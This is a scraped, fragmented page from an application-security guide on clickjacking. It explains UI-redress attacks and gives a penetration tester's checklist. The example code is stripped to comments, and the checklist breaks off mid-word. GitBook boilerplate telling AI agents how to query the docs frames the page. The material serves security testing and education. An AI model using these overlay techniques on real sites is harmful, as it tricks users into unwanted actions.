https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication/attacking-mfa.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. --- # Unknown \> For the complete documentation index, see \[llms.txt\](https://appsecexplained.gitbook.io/appsecexplained/llms.txt). Markdown versions of documentation pages are available by appending \`.md\` to page URLs; this page is available as \[Markdown\](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking.md). # Clickjacking ## What is it? Clickjacking (also known as a "UI redress attack") involves tricking a user into clicking something different from what the user perceives, potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. This is achieved by manipulating the visibility and position of page elements. \*\*A simple example\*\* A malicious website embeds a transparent iframe of a legitimate website where a valuable action resides (like a "delete all" button). The attacker overlays the iframe with seemingly harmless UI - for example, a button that says "Click here to win a prize!". When a user clicks on this button, they unknowingly perform the action on the legitimate website. Clickjacking can lead to: \* Unwanted actions performed by the user \* Disclosure of sensitive information \* Potential Remote Code Execution (RCE) if combined with other vulnerabilities \*\*Other learning resources:\*\* \* OWASP: ; \* PortSwigger: \## Checklist \* \[ \] Does the application implement X-Frame-Options header or equivalent protection (e.g., Content Security Policy)? \* \[ \] Can you overlay malicious UI over the application's interface? \* \[ \] Can you perform sensitive actions on behalf of the user? \* \[ \] Can you trick the user into interacting with the overlaid UI? \* \[ \] Does the application prevent being loaded in an iframe? \* \[ \] Can you manipulate the opacity an \`\`\` # Embed the target page in an iframe \# Overlay with malicious UI Click me \`\`\` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the \`ask\` query parameter, and the optional \`goal\` query parameter: \`\`\` GET https://appsecexplained.gitbook.io/appsecexplained/common-vulns/clickjacking.md?ask=&goal= \`\`\` \`ask\` is the immediate question: it should be specific, self-contained, and written in natural language. \`goal\` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections. ---